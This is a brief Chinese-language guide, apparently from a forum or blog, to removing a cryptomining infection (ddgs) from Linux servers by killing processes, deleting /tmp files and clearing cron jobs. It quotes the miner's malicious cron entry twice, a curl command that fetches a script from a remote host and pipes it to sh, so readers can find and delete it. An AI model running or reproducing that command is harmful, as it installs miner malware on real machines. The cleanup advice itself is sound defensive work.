已处理过多台服务器,目前没再被植入挖矿,按照以下步骤可行:
1、安装杀毒软件ClamAV
https://www.cnblogs.com/duoyi/articles/clamav.html
2、删除挖矿植入的代码、定时任务
a、查看占有内存高的进程,
top
b、删除对应的进程
kill -9 ID
c、删除tmp下对应的文件
rm -rf /tmp/文件2t3ik与ddgs
d、删除定时任务的内容
crontab -e
将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除
e、检查/var/spool/cron/root 和 /var/spool/cron/crontabs/root
删除自动执行命令
/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh
参考内容: